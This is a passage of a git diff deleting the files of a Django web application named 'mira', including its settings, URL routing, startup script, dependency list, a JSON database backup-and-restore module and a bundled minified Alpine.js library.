administrative tasks.""" - os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mira.settings') - try: - from django.core.management import execute_from_command_line - except ImportError as exc: - raise ImportError( - "Couldn't import Django. Are you sure it's installed and " - "available on your PYTHONPATH environment variable? Did you " - "forget to activate a virtual environment?" - ) from exc - execute_from_command_line(sys.argv) - - -if __name__ == '__main__': - main() diff --git a/mira/VERSION b/mira/VERSION deleted file mode 100644 index 3e6aa38..0000000 --- a/mira/VERSION +++ /dev/null @@ -1 +0,0 @@ -3.0.2c diff --git a/mira/__init__.py b/mira/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/mira/asgi.py b/mira/asgi.py deleted file mode 100644 index e6b2e74..0000000 --- a/mira/asgi.py +++ /dev/null @@ -1,16 +0,0 @@ -""" -ASGI config for mira project. - -It exposes the ASGI callable as a module-level variable named ``application``. - -For more information on this file, see -https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/ -""" - -import os - -from django.core.asgi import get_asgi_application - -os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mira.settings') - -application = get_asgi_application() diff --git a/mira/scripts/generate_build_file.sh b/mira/scripts/generate_build_file.sh deleted file mode 100755 index e3f32f8..0000000 --- a/mira/scripts/generate_build_file.sh +++ /dev/null @@ -1,40 +0,0 @@ -#!/bin/bash - -# This script generates a version file for the current build. -# It is used by the build system to determine the version of the -# current build. - -# The version file is composed of the following attributes: -# - version: the marketing version of the build -# - build: .. -# - development: true if the build is a development build, false otherwise -# - commit: the commit hash of the current build -# - timestamp: the timestamp of the current build - -# The script outputs a JSON file with the above attributes. - -get_commit_hash() { - git rev-parse HEAD -} - -get_commit_timestamp() { - git show -s --format=%cI HEAD -} - -get_branch_name() { - git rev-parse --abbrev-ref HEAD -} - -get_build() { - echo "$(get_branch_name) $(get_commit_hash) $(get_commit_timestamp)" -} - -main() { - local build=$(get_build) - - echo "{ - \"build\": \"$build\" -}" -} - -main "$@" \ No newline at end of file diff --git a/mira/settings.py b/mira/settings.py deleted file mode 100644 index 370a84f..0000000 --- a/mira/settings.py +++ /dev/null @@ -1,259 +0,0 @@ -""" -Django settings for mira project. - -Generated by 'django-admin startproject' using Django 3.2.6. - -For more information on this file, see -https://docs.djangoproject.com/en/3.2/topics/settings/ - -For the full list of settings and their values, see -https://docs.djangoproject.com/en/3.2/ref/settings/ - - -if "POSTGRES_NAME" environment variable defined, the database engine is posgresql -and the other env variables are POSGRES_USER, POSTGRES_PASSWORD, DB_HOST, DB_PORT -else it is sqlite, and no env variable is required - -""" - -from pathlib import Path -import os -import json -from urllib.parse import urlparse -from django.core.management.utils import get_random_secret_key - -# Build paths inside the project like this: BASE_DIR / 'subdir'. -BASE_DIR = Path(__file__).resolve().parent.parent - -print("BASE_DIR:", BASE_DIR) - -with open(BASE_DIR / 'mira/VERSION') as f: - VERSION = f.read().strip() - print(f'MIRA Version: {VERSION}') - -try: - with open(BASE_DIR / 'mira/build.json') as f: - BUILD = json.load(f)['build'] -except FileNotFoundError: - BUILD = 'unset' - print('MIRA Build: unset. Please refer to the documentation to set it.') - -# Quick-start development settings - unsuitable for production -# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ - -# SECURITY WARNING: keep the secret key used in production secret! -SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', get_random_secret_key()) - -# SECURITY WARNING: don't run with debug turned on in production! -DEBUG = os.environ.get('DJANGO_DEBUG') == 'True' - -MIRA_URL = os.environ.get('MIRA_URL', 'http://127.0.0.1:8000') -ALLOWED_HOSTS = [urlparse(MIRA_URL).hostname] -CSRF_TRUSTED_ORIGINS = [MIRA_URL] - -RECAPTCHA_PUBLIC_KEY = os.environ.get('RECAPTCHA_PUBLIC_KEY') -RECAPTCHA_PRIVATE_KEY = os.environ.get('RECAPTCHA_PRIVATE_KEY') -SILENCED_SYSTEM_CHECKS = ['captcha.recaptcha_test_key_error'] # see https://developers.google.com/recaptcha/docs/faq - -PAGINATE_BY = os.environ.get('PAGINATE_BY', default=500) - - -# Application definition - -INSTALLED_APPS = [ - 'django.contrib.auth', - 'django.contrib.contenttypes', - 'django.contrib.sessions', - 'django.contrib.messages', - "whitenoise.runserver_nostatic", - 'django.contrib.staticfiles', - 'django.forms', - 'fieldsets_with_inlines', - 'tailwind', - 'theme', - 'iam', - 'core', - 'cal', - 'django_filters', - 'library', - 'serdes', - 'passkeys', -] - -if RECAPTCHA_PUBLIC_KEY: - INSTALLED_APPS.append('captcha') - print("recaptcha enabled") -else: - print("recaptcha disabled") - - -MIDDLEWARE = [ - 'django.middleware.security.SecurityMiddleware', - 'django.contrib.sessions.middleware.SessionMiddleware', - 'django.middleware.locale.LocaleMiddleware', - 'django.middleware.common.CommonMiddleware', - 'django.middleware.csrf.CsrfViewMiddleware', - 'django.contrib.auth.middleware.AuthenticationMiddleware', - 'django.contrib.messages.middleware.MessageMiddleware', - 'django.middleware.clickjacking.XFrameOptionsMiddleware', - 'django.middleware.security.SecurityMiddleware', - 'whitenoise.middleware.WhiteNoiseMiddleware', -] - -ROOT_URLCONF = 'mira.urls' -LOGIN_REDIRECT_URL = 'home' -LOGOUT_REDIRECT_URL = 'login' - -SESSION_COOKIE_AGE = int(os.environ.get('SESSION_COOKIE_AGE', default=60*15)) # defaults to 15 minutes -SESSION_SAVE_EVERY_REQUEST = os.environ.get('SESSION_SAVE_EVERY_REQUEST', default=True) # prevents session from expiring when user is active -SESSION_EXPIRE_AT_BROWSER_CLOSE = os.environ.get('SESSION_EXPIRE_AT_BROWSER_CLOSE', default=True) - -MIRA_SUPERUSER_EMAIL = os.environ.get('MIRA_SUPERUSER_EMAIL') -MIRA_SUPERUSER_PASSWORD = os.environ.get('MIRA_SUPERUSER_PASSWORD') -DEFAULT_FROM_EMAIL = os.environ.get('DEFAULT_FROM_EMAIL') - -EMAIL_HOST = os.environ.get('EMAIL_HOST') -EMAIL_PORT = os.environ.get('EMAIL_PORT') -EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER') -EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD') -EMAIL_USE_TLS = os.environ.get('EMAIL_USE_TLS') -# rescue mail -EMAIL_HOST_RESCUE = os.environ.get('EMAIL_HOST_RESCUE') -EMAIL_PORT_RESCUE = os.environ.get('EMAIL_PORT_RESCUE') -EMAIL_HOST_USER_RESCUE = os.environ.get('EMAIL_HOST_USER_RESCUE') -EMAIL_HOST_PASSWORD_RESCUE = os.environ.get('EMAIL_HOST_PASSWORD_RESCUE') -EMAIL_USE_TLS_RESCUE = os.environ.get('EMAIL_USE_TLS_RESCUE') - -EMAIL_TIMEOUT = int(os.environ.get('EMAIL_TIMEOUT', default="5")) # seconds - -## Licence management -LICENCE_DEPLOYMENT = os.environ.get('LICENCE_DEPLOYMENT', default="On-premises") -LICENCE_TYPE = os.environ.get('LICENCE_TYPE', default="Standard") -LICENCE_SUPPORT = os.environ.get('LICENCE_SUPPORT', default="Standard") -LICENCE_EXPIRATION = os.environ.get('LICENCE_EXPIRATION', default="-") - - -TEMPLATES = [ - { - 'BACKEND': 'django.template.backends.django.DjangoTemplates', - 'DIRS': [ - BASE_DIR / "core/templates", - ], - 'APP_DIRS': True, - 'OPTIONS': { - 'context_processors': [ - 'django.template.context_processors.debug', - 'django.template.context_processors.request', - 'django.contrib.auth.context_processors.auth', - 'django.contrib.messages.context_processors.messages', - ], - }, - }, -] - -FORM_RENDERER = 'django.forms.renderers.TemplatesSetting' - -WSGI_APPLICATION = 'mira.wsgi.application' - -AUTH_USER_MODEL = 'iam.User' - -# Password validation -# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators - -AUTH_PASSWORD_VALIDATORS = [ - { - 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', - }, - { - 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', - }, - { - 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', - }, - { - 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', - }, -] - -# Internationalization -# https://docs.djangoproject.com/en/3.2/topics/i18n/ - -LANGUAGE_CODE = 'en' - -TIME_ZONE = 'UTC' - -USE_I18N = True - -USE_L10N = True - -USE_TZ = True - -LANGUAGES = [ - ('en','English'), - ('fr', 'French'), -] - -PROJECT_PATH = os.path.dirname(os.path.abspath(__file__)) - -LOCALE_PATHS = ( - os.path.join(PROJECT_PATH, '../locale'), -) - -# Static files (CSS, JavaScript, Images) -# https://docs.djangoproject.com/en/3.2/howto/static-files/ - -STATIC_ROOT = BASE_DIR / 'staticfiles' # for collectstatic -STATICFILES_DIRS = [ - BASE_DIR / "static", # the js files are here -] - -STATIC_URL = '/static/' - -# Default primary key field type -# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field - -DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' - -TAILWIND_APP_NAME = 'theme' -INTERNAL_IPS = [ - "127.0.0.1", -] - -# Database -# https://docs.djangoproject.com/en/3.2/ref/settings/#databases - - -if 'POSTGRES_NAME' in os.environ: - print("Postgresql database engine") - DATABASES = { - 'default': { - 'ENGINE': 'django.db.backends.postgresql_psycopg2', - 'NAME': os.environ['POSTGRES_NAME'], - 'USER': os.environ['POSTGRES_USER'], - 'PASSWORD': os.environ['POSTGRES_PASSWORD'], - 'HOST': os.environ['DB_HOST'], - 'PORT': os.environ.get('DB_PORT', '5432'), - } - } - print("Postgresql database engine") -else: - print("sqlite database engine") - DATABASES = { - 'default': { - 'ENGINE': 'django.db.backends.sqlite3', - 'NAME': BASE_DIR / "db/mira.sqlite3", - } - } - -AUTHENTICATION_BACKENDS = ['passkeys.backend.PasskeyModelBackend'] -FIDO_SERVER_ID=urlparse(MIRA_URL).hostname -FIDO_SERVER_NAME="FidoMira" -# leave KEY_ATTACHMENT undefined to allow both platform and roaming authenticators - -PASSWORD_HASHERS = [ - 'django.contrib.auth.hashers.Argon2PasswordHasher', - 'django.contrib.auth.hashers.PBKDF2PasswordHasher', - 'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher', - 'django.contrib.auth.hashers.BCryptSHA256PasswordHasher', - 'django.contrib.auth.hashers.ScryptPasswordHasher', -] diff --git a/mira/urls.py b/mira/urls.py deleted file mode 100644 index d34dd5f..0000000 --- a/mira/urls.py +++ /dev/null @@ -1,33 +0,0 @@ -"""mira URL Configuration - -The `urlpatterns` list routes URLs to views. For more information please see: - https://docs.djangoproject.com/en/3.2/topics/http/urls/ -Examples: -Function views - 1. Add an import: from my_app import views - 2. Add a URL to urlpatterns: path('', views.home, name='home') -Class-based views - 1. Add an import: from other_app.views import Home - 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') -Including another URLconf - 1. Import the include() function: from django.urls import include, path - 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) -""" -from django.urls import include, path -import core.views as cv -from django.contrib.auth import views as auth_views -from django.contrib.auth.decorators import login_required - -# beware of the order of url patterns, this can change de behavior in case of multiple matches and avoid giving identical paths that could cause conflicts -urlpatterns = [ - path('', include('core.urls')), - path('libraries/', include('library.urls')), - path('serdes/', include('serdes.urls')), - - path('accounts/login/', cv.UserLogin.as_view(), name='login'), - path('accounts/logout/', auth_views.LogoutView.as_view(), {'next_page': '/'}, name='logout'), - - path('', login_required(cv.AnalysisListView.as_view()), name='home'), - path('x-rays', login_required(cv.ReviewView.as_view()), name='xrays'), - path('passkeys/', include('passkeys.urls')), -] diff --git a/mira/wsgi.py b/mira/wsgi.py deleted file mode 100644 index e233914..0000000 --- a/mira/wsgi.py +++ /dev/null @@ -1,16 +0,0 @@ -""" -WSGI config for mira project. - -It exposes the WSGI callable as a module-level variable named ``application``. - -For more information on this file, see -https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/ -""" - -import os - -from django.core.wsgi import get_wsgi_application - -os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mira.settings') - -application = get_wsgi_application() diff --git a/requirements.txt b/requirements.txt deleted file mode 100644 index 8746dec..0000000 --- a/requirements.txt +++ /dev/null @@ -1,17 +0,0 @@ -django==4.2.5 -pandas==2.1.1 -weasyprint==59.0 -django-tailwind==3.6.0 -django-import-export==3.3.1 -django-admin-csvexport==2.2 -django-fieldsets-with-inlines==0.6 -psycopg2-binary==2.9.7 -gunicorn==21.2.0 -pytest-django==4.5.2 -playwright==1.38.0 -pytest-playwright==0.4.2 -django-filter==23.3 -whitenoise==6.5.0 -django-recaptcha==3.0.0 -django-passkeys==1.2.5 -argon2-cffi==23.1.0 diff --git a/serdes/README.md b/serdes/README.md deleted file mode 100644 index 4fc2cde..0000000 --- a/serdes/README.md +++ /dev/null @@ -1,8 +0,0 @@ -# SerDes: Serializer-Deserializer - -## Features - -This app makes it easy to: -- Serialize database objects to json, jsonl, xml, yaml -- Deserialize any of these formats to database objects -- Set up backups and restores in any Django project diff --git a/serdes/__init__.py b/serdes/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/serdes/forms.py b/serdes/forms.py deleted file mode 100644 index c187862..0000000 --- a/serdes/forms.py +++ /dev/null @@ -1,16 +0,0 @@ -from typing import Any, Dict -from django import forms -from django.utils.translation import gettext_lazy as _ - -class UploadFileForm(forms.Form): - file = forms.FileField(required=True, label=_('Select a file')) - - def clean(self) -> Dict[str, Any]: - cleaned_data = super().clean() - file = cleaned_data.get('file') - - if file: - if not file.name.endswith('.json'): - self.add_error('file', _('File must be a JSON file.')) - - return file diff --git a/serdes/permissions.py b/serdes/permissions.py deleted file mode 100644 index e69de29..0000000 diff --git a/serdes/templates/serdes/backup_restore.html b/serdes/templates/serdes/backup_restore.html deleted file mode 100644 index 1031f49..0000000 --- a/serdes/templates/serdes/backup_restore.html +++ /dev/null @@ -1,112 +0,0 @@ -{% extends 'core/base.html' %} - -{% load i18n static %} - -{% block content %} - -
    - {% with page_title=_('Backup Restore') %} - {% include 'snippets/breadcrumbs.html' %} - {% endwith %} - -
    -
    -

    {% trans "Export backup" %}

    - -
    -
    -

    {% trans "Import backup" %}

    -
    - {% csrf_token %} -

    {{ form.non_field_errors|striptags }}

    - -
    - - -

    {% trans "Upload" %}

    -
    - - {% load i18n static core_extras %} - -
    - - - - -
    - - - - - -
    -
    -
    -
    - -
    -
    -
    -
    -
    - -{% endblock content %} diff --git a/serdes/tests/__init__.py b/serdes/tests/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/serdes/tests/test_utils.py b/serdes/tests/test_utils.py deleted file mode 100644 index 08805f2..0000000 --- a/serdes/tests/test_utils.py +++ /dev/null @@ -1,9 +0,0 @@ -from serdes.utils import * -from django.contrib.auth.models import Permission -import pytest - -@pytest.fixture -def basic_folder_structure(): - Folder.objects.create( - name="Global", content_type=Folder.ContentType.ROOT, builtin=True) - Folder.objects.create(name="Test folder", content_type=Folder.ContentType.DOMAIN, builtin=False) diff --git a/serdes/urls.py b/serdes/urls.py deleted file mode 100644 index 4aed965..0000000 --- a/serdes/urls.py +++ /dev/null @@ -1,9 +0,0 @@ -from django.urls import path -from django.contrib.auth.decorators import login_required - -from . import views - -urlpatterns = [ - path('backup-restore/', login_required(views.BackupRestoreView.as_view()), name='backup-restore'), - path('dump-db/', login_required(views.dump_db_view), name='dump-db'), -] \ No newline at end of file diff --git a/serdes/utils.py b/serdes/utils.py deleted file mode 100644 index b708462..0000000 --- a/serdes/utils.py +++ /dev/null @@ -1,92 +0,0 @@ -from typing import Iterable - -import django.apps -from django.core import serializers -from django.db.models import Model -from django.db.models.deletion import Collector - -from iam.models import Folder - - -def get_all_objects(): - ''' - Get all objects in the database. - - Returns: - -------- - objects: list - List of objects in the database. - ''' - objects = list() - for app in django.apps.apps.get_app_configs(): - for model in app.get_models(): - objects.extend(model.objects.all()) - return objects - - -def dump_objects(queryset: Iterable[Model], path: str, format: str = 'json'): - ''' - Dump objects to a file. - - Parameters: - ----------- - queryset: Iterable[Model] - Queryset of objects to dump. - path: str - Path to the file to dump to. - format: str - Format to dump to. Default is 'json'. - ''' - serialized_objects = serializers.serialize(format, queryset) - if path == '-': - print(serialized_objects) - else: - with open(path, 'w') as outfile: - outfile.write(serialized_objects) - return path - - -def get_objects_from_folder(folder: Folder) -> set: - ''' - Collates all objects in a folder. - - Parameters: - ----------- - folder: Folder - Folder to get objects from. - - Returns: - -------- - objects: list - List of objects in the folder. - ''' - objects = set() - # NOTE: This is a hack to get all objects in a folder. - # As all objects contained in a folder are deleted - # when the folder is deleted, we can use the Django - # deletion collector to get all the objects in a folder. - collector = Collector(using='default') - collector.collect([folder]) - - for model, model_instances in collector.data.items(): - objects.update(model_instances) - - return objects - -def restore_objects(path: str, format: str = 'json'): - ''' - Restore objects from a file. - - Parameters: - ----------- - path: str - Path to the file to restore from. - format: str - Format to restore from. Default is 'json'. - ''' - with open(path, 'r') as infile: - serialized_objects = infile.read() - objects = serializers.deserialize(format, serialized_objects) - for obj in objects: - obj.save() - return path \ No newline at end of file diff --git a/serdes/views.py b/serdes/views.py deleted file mode 100644 index 1e4d6cb..0000000 --- a/serdes/views.py +++ /dev/null @@ -1,85 +0,0 @@ -from django.http import HttpResponse -from django.views.generic import FormView -from django.urls import reverse_lazy -from django.contrib import messages -from django.core import management -from django.core.management.commands import loaddata, dumpdata -from django.contrib.auth.mixins import UserPassesTestMixin -from django.contrib.auth.decorators import user_passes_test -from datetime import datetime - -from iam.models import RoleAssignment -from mira.settings import VERSION -from core.views import BaseContextMixin - -import re -import sys -import io - -from .forms import * - -def is_admin_check(user): - return user.has_backup_permission - - -class BackupRestoreView(BaseContextMixin, FormView, UserPassesTestMixin): - template_name = 'serdes/backup_restore.html' - form_class = UploadFileForm - success_url = reverse_lazy('backup-restore') - - def get_context_data(self, **kwargs: Any) -> Dict[str, Any]: - context = super().get_context_data(**kwargs) - return context - - def dispatch(self, request, *args, **kwargs): - if not is_admin_check(request.user): - return HttpResponse(status=403) - return super().dispatch(request, *args, **kwargs) - - def post(self, request, *args, **kwargs): - if not RoleAssignment.has_permission(request.user, "restore"): - return HttpResponse(status=403) - form_class = self.get_form_class() - form = self.get_form(form_class) - file = request.FILES.get('file') - - if form.is_valid(): - if file: - # NOTE: This method implies we trust the data in the file. - # Here we are scrubbing the metadata from the file, as loaddata expects a raw dump. - head_pattern = r'.+?(?=,\n*\[\n*{\n\s*"model").\n' - tail_pattern = r']\Z' - file_content = file.read().decode('utf-8') - trimmed_content = re.sub(head_pattern, '', file_content) - trimmed_content = re.sub(tail_pattern, '', trimmed_content) - - # NOTE: This method is not safe, as we do not check the file extension and content. - # Furthermore, this is not suitable to load data from selected folders - sys.stdin = io.StringIO(trimmed_content) - request.session.flush() - management.call_command('flush', interactive=False) - # Here we load the data from stdin - management.call_command(loaddata.Command(), '-', format="json", verbosity=0, exclude=['contenttypes', 'auth.permission', 'sessions.session']) - print('Database restored successfully.') - else: - print('No file selected for restore.') - return self.form_valid(form) - else: - return self.form_invalid(form) - - def test_func(self): - return is_admin_check(self.request.user) - - -@user_passes_test(is_admin_check) -def dump_db_view(request): - response = HttpResponse(content_type='application/json') - timestamp = datetime.now().strftime("%Y%m%d-%H%M%S") - response['Content-Disposition'] = f'attachment; filename="mira-db-{timestamp}.json"' - - response.write(f'[{{"meta": [{{"media_version": "{VERSION}"}}]}},\n') - # Here we dump th data to stdout - # NOTE: We will not be able to dump selected folders with this method. - management.call_command(dumpdata.Command(), exclude=['contenttypes', 'auth.permission', 'sessions.session'], indent=4, stdout=response, natural_foreign=True) - response.write(']') - return response \ No newline at end of file diff --git a/startup.sh b/startup.sh deleted file mode 100755 index d2a0136..0000000 --- a/startup.sh +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env bash -# wait for database to be ready - -if [ ! -n "$DJANGO_SECRET_KEY" ]; then - if [ ! -f db/django_secret_key ]; then - cat /proc/sys/kernel/random/uuid > db/django_secret_key - echo "generating initial Django secret key" - fi - export DJANGO_SECRET_KEY=$( /dev/null; do - echo "database not ready; waiting" - sleep 10 -done - -python manage.py collectstatic --noinput -python manage.py migrate -python manage.py makemessages -i venv -l fr -python manage.py compilemessages -i venv -l fr -if [ ! -z ${CREATE_SUPERUSER+x} ]; then - python manage.py createsuperuser -fi - -exec gunicorn --chdir mira --bind :8000 --env RUN_MAIN=true mira.wsgi:application diff --git a/static/cache/alpine-3.12.0.min.js b/static/cache/alpine-3.12.0.min.js deleted file mode 100644 index d806d32..0000000 --- a/static/cache/alpine-3.12.0.min.js +++ /dev/null @@ -1,5 +0,0 @@ -(()=>{var Ye=!1,Ze=!1,V=[],Qe=-1;function Bt(e){hn(e)}function hn(e){V.includes(e)||V.push(e),_n()}function ye(e){let t=V.indexOf(e);t!==-1&&t>Qe&&V.splice(t,1)}function _n(){!Ze&&!Ye&&(Ye=!0,queueMicrotask(gn))}function gn(){Ye=!1,Ze=!0;for(let e=0;ee.effect(t,{scheduler:r=>{Xe?Bt(r):r()}}),et=e.raw}function tt(e){P=e}function Vt(e){let t=()=>{};return[n=>{let i=P(n);return e._x_effects||(e._x_effects=new Set,e._x_runEffects=()=>{e._x_effects.forEach(o=>o())}),e._x_effects.add(i),t=()=>{i!==void 0&&(e._x_effects.delete(i),L(i))},i},()=>{t()}]}var Ht=[],qt=[],Ut=[];function Wt(e){Ut.push(e)}function we(e,t){typeof t=="function"?(e._x_cleanups||(e._x_cleanups=[]),e._x_cleanups.push(t)):(t=e,qt.push(t))}function Gt(e){Ht.push(e)}function Jt(e,t,r){e._x_attributeCleanups||(e._x_attributeCleanups={}),e._x_attributeCleanups[t]||(e._x_attributeCleanups[t]=[]),e._x_attributeCleanups[t].push(r)}function nt(e,t){e._x_attributeCleanups&&Object.entries(e._x_attributeCleanups).forEach(([r,n])=>{(t===void 0||t.includes(r))&&(n.forEach(i=>i()),delete e._x_attributeCleanups[r])})}var it=new MutationObserver(ct),ot=!1;function se(){it.observe(document,{subtree:!0,childList:!0,attributes:!0,attributeOldValue:!0}),ot=!0}function st(){xn(),it.disconnect(),ot=!1}var oe=[],rt=!1;function xn(){oe=oe.concat(it.takeRecords()),oe.length&&!rt&&(rt=!0,queueMicrotask(()=>{yn(),rt=!1}))}function yn(){ct(oe),oe.length=0}function h(e){if(!ot)return e();st();let t=e();return se(),t}var at=!1,be=[];function Yt(){at=!0}function Zt(){at=!1,ct(be),be=[]}function ct(e){if(at){be=be.concat(e);return}let t=[],r=[],n=new Map,i=new Map;for(let o=0;os.nodeType===1&&t.push(s)),e[o].removedNodes.forEach(s=>s.nodeType===1&&r.push(s))),e[o].type==="attributes")){let s=e[o].target,a=e[o].attributeName,c=e[o].oldValue,l=()=>{n.has(s)||n.set(s,[]),n.get(s).push({name:a,value:s.getAttribute(a)})},u=()=>{i.has(s)||i.set(s,[]),i.get(s).push(a)};s.hasAttribute(a)&&c===null?l():s.hasAttribute(a)?(u(),l()):u()}i.forEach((o,s)=>{nt(s,o)}),n.forEach((o,s)=>{Ht.forEach(a=>a(s,o))});for(let o of r)if(!t.includes(o)&&(qt.forEach(s=>s(o)),o._x_cleanups))for(;o._x_cleanups.length;)o._x_cleanups.pop()();t.forEach(o=>{o._x_ignoreSelf=!0,o._x_ignore=!0});for(let o of t)r.includes(o)||o.isConnected&&(delete o._x_ignoreSelf,delete o._x_ignore,Ut.forEach(s=>s(o)),o._x_ignore=!0,o._x_ignoreSelf=!0);t.forEach(o=>{delete o._x_ignoreSelf,delete o._x_ignore}),t=null,r=null,n=null,i=null}function Ee(e){return j($(e))}function R(e,t,r){return e._x_dataStack=[t,...$(r||e)],()=>{e._x_dataStack=e._x_dataStack.filter(n=>n!==t)}}function lt(e,t){let r=e._x_dataStack[0];Object.entries(t).forEach(([n,i])=>{r[n]=i})}function $(e){return e._x_dataStack?e._x_dataStack:typeof ShadowRoot=="function"&&e instanceof ShadowRoot?$(e.host):e.parentNode?$(e.parentNode):[]}function j(e){let t=new Proxy({},{ownKeys:()=>Array.from(new Set(e.flatMap(r=>Object.keys(r)))),has:(r,n)=>e.some(i=>i.hasOwnProperty(n)),get:(r,n)=>(e.find(i=>{if(i.hasOwnProperty(n)){let o=Object.getOwnPropertyDescriptor(i,n);if(o.get&&o.get._x_alreadyBound||o.set&&o.set._x_alreadyBound)return!0;if((o.get||o.set)&&o.enumerable){let s=o.get,a=o.set,c=o;s=s&&s.bind(t),a=a&&a.bind(t),s&&(s._x_alreadyBound=!0),a&&(a._x_alreadyBound=!0),Object.defineProperty(i,n,{...c,get:s,set:a})}return!0}return!1})||{})[n],set:(r,n,i)=>{let o=e.find(s=>s.hasOwnProperty(n));return o?o[n]=i:e[e.length-1][n]=i,!0}});return t}function ve(e){let t=n=>typeof n=="object"&&!Array.isArray(n)&&n!==null,r=(n,i="")=>{Object.entries(Object.getOwnPropertyDescriptors(n)).forEach(([o,{value:s,enumerable:a}])=>{if(a===!1||s===void 0)return;let c=i===""?o:`${i}.${o}`;typeof s=="object"&&s!==null&&s._x_interceptor?n[o]=s.initialize(e,c,o):t(s)&&s!==n&&!(s instanceof Element)&&r(s,c)})};return r(e)}function Se(e,t=()=>{}){let r={initialValue:void 0,_x_interceptor:!0,initialize(n,i,o){return e(this.initialValue,()=>bn(n,i),s=>ut(n,i,s),i,o)}};return t(r),n=>{if(typeof n=="object"&&n!==null&&n._x_interceptor){let i=r.initialize.bind(r);r.initialize=(o,s,a)=>{let c=n.initialize(o,s,a);return r.initialValue=c,i(o,s,a)}}else r.initialValue=n;return r}}function bn(e,t){return t.split(".").reduce((r,n)=>r[n],e)}function ut(e,t,r){if(typeof t=="string"&&(t=t.split(".")),t.length===1)e[t[0]]=r;else{if(t.length===0)throw error;return e[t[0]]||(e[t[0]]={}),ut(e[t[0]],t.slice(1),r)}}var Qt={};function y(e,t){Qt[e]=t}function ae(e,t){return Object.entries(Qt).forEach(([r,n])=>{Object.defineProperty(e,`$${r}`,{get(){let[i,o]=ft(t);return i={interceptor:Se,...i},we(t,o),n(t,i)},enumerable:!1})}),e}function Xt(e,t,r,...n){try{return r(...n)}catch(i){Z(i,e,t)}}function Z(e,t,r=void 0){Object.assign(e,{el:t,expression:r}),console.warn(`Alpine Expression Error: ${e.message} - -${r?'Expression: "'+r+`" - -`:""}`,t),setTimeout(()=>{throw e},0)}var Ae=!0;function er(e){let t=Ae;Ae=!1,e(),Ae=t}function I(e,t,r={}){let n;return x(e,t)(i=>n=i,r),n}function x(...e){return tr(...e)}var tr=pt;function rr(e){tr=e}function pt(e,t){let r={};ae(r,e);let n=[r,...$(e)],i=typeof t=="function"?wn(n,t):vn(n,t,e);return Xt.bind(null,e,t,i)}function wn(e,t){return(r=()=>{},{scope:n={},params:i=[]}={})=>{let o=t.apply(j([n,...e]),i);Oe(r,o)}}var dt={};function En(e,t){if(dt[e])return dt[e];let r=Object.getPrototypeOf(async function(){}).constructor,n=/^[\n\s]*if.*\(.*\)/.test(e)||/^(let|const)\s/.test(e)?`(async()=>{ ${e} })()`:e,o=(()=>{try{return new r(["__self","scope"],`with (scope) { __self.result = ${n} }; __self.finished = true; return __self.result;`)}catch(s){return Z(s,t,e),Promise.resolve()}})();return dt[e]=o,o}function vn(e,t,r){let n=En(t,r);return(i=()=>{},{scope:o={},params:s=[]}={})=>{n.result=void 0,n.finished=!1;let a=j([o,...e]);if(typeof n=="function"){let c=n(n,a).catch(l=>Z(l,r,t));n.finished?(Oe(i,n.result,a,s,r),n.result=void 0):c.then(l=>{Oe(i,l,a,s,r)}).catch(l=>Z(l,r,t)).finally(()=>n.result=void 0)}}}function Oe(e,t,r,n,i){if(Ae&&typeof t=="function"){let o=t.apply(r,n);o instanceof Promise?o.then(s=>Oe(e,s,r,n)).catch(s=>Z(s,i,t)):e(o)}else typeof t=="object"&&t instanceof Promise?t.then(o=>e(o)):e(t)}var gt="x-";function S(e=""){return gt+e}function nr(e){gt=e}var mt={};function p(e,t){return mt[e]=t,{before(r){if(!mt[r]){console.warn("Cannot find directive `${directive}`. `${name}` will use the default order of execution");return}let n=H.indexOf(r);H.splice(n>=0?n:H.indexOf("DEFAULT"),0,e)}}}function le(e,t,r){if(t=Array.from(t),e._x_virtualDirectives){let o=Object.entries(e._x_virtualDirectives).map(([a,c])=>({name:a,value:c})),s=xt(o);o=o.map(a=>s.find(c=>c.name===a.name)?{name:`x-bind:${a.name}`,value:`"${a.value}"`}:a),t=t.concat(o)}let n={};return t.map(sr((o,s)=>n[o]=s)).filter(cr).map(An(n,r)).sort(On).map(o=>Sn(e,o))}function xt(e){return Array.from(e).map(sr()).filter(t=>!cr(t))}var ht=!1,ce=new Map,ir=Symbol();function or(e){ht=!0;let t=Symbol();ir=t,ce.set(t,[]);let r=()=>{for(;ce.get(t).length;)ce.get(t).shift()();ce.delete(t)},n=()=>{ht=!1,r()};e(r),n()}function ft(e){let t=[],r=a=>t.push(a),[n,i]=Vt(e);return t.push(i),[{Alpine:F,effect:n,cleanup:r,evaluateLater:x.bind(x,e),evaluate:I.bind(I,e)},()=>t.forEach(a=>a())]}function Sn(e,t){let r=()=>{},n=mt[t.type]||r,[i,o]=ft(e);Jt(e,t.original,o);let s=()=>{e._x_ignore||e._x_ignoreSelf||(n.inline&&n.inline(e,t,i),n=n.bind(n,e,t,i),ht?ce.get(ir).push(n):n())};return s.runCleanups=o,s}var Ce=(e,t)=>({name:r,value:n})=>(r.startsWith(e)&&(r=r.replace(e,t)),{name:r,value:n}),Te=e=>e;function sr(e=()=>{}){return({name:t,value:r})=>{let{name:n,value:i}=ar.reduce((o,s)=>s(o),{name:t,value:r});return n!==t&&e(n,t),{name:n,value:i}}}var ar=[];function Q(e){ar.push(e)}function cr({name:e}){return lr().test(e)}var lr=()=>new RegExp(`^${gt}([^:^.]+)\\b`);function An(e,t){return({name:r,value:n})=>{let 